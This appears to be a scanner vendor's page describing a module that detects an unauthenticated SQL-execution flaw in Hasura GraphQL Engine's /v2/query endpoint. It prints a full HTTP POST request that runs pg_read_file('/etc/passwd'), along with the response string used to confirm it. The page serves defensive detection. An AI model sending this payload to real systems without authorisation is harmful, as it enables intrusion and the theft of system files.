Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Hasura GraphQL Engine - Remote Code Execution" module is designed to detect a vulnerability in the Hasura GraphQL Engine software. This vulnerability allows remote unauthenticated users to execute arbitrary SQL statements through the "/v2/query" endpoint, leading to remote code execution. The severity of this vulnerability is classified as critical, with a CVSS score of 10. The module was authored by Udyz.
If exploited, this vulnerability can have severe consequences. Attackers can execute arbitrary SQL statements, potentially gaining unauthorized access to sensitive data, modifying the database, or even compromising the entire system. It is crucial to address this vulnerability promptly to prevent any potential damage.
The module sends an HTTP POST request to the "/v2/query" endpoint of the Hasura GraphQL Engine. The request payload includes a SQL statement that attempts to read the contents of the "/etc/passwd" file. The module then applies a matching condition to check if the response body contains the string "root:.*:0:0:". If this condition is met, it indicates that the SQL statement was successfully executed, and the vulnerability is present.
Example HTTP request:
POST /v2/query HTTP/1.1
Host: {%Hostname%}
Content-Type: application/json
{
"type": "bulk",
"source": "default",
"args": [
{
"type": "run_sql",
"args": {
"source": "default",
"sql": "SELECT pg_read_file('/etc/passwd',0,100000);",
"cascade": false,
"read_only": false
}
}
]
}
The module's matching condition checks if the response body contains the string "root:.*:0:0:". If this condition is met, it indicates that the SQL statement successfully read the contents of the "/etc/passwd" file, confirming the presence of the vulnerability.
For more information, refer to the official documentation.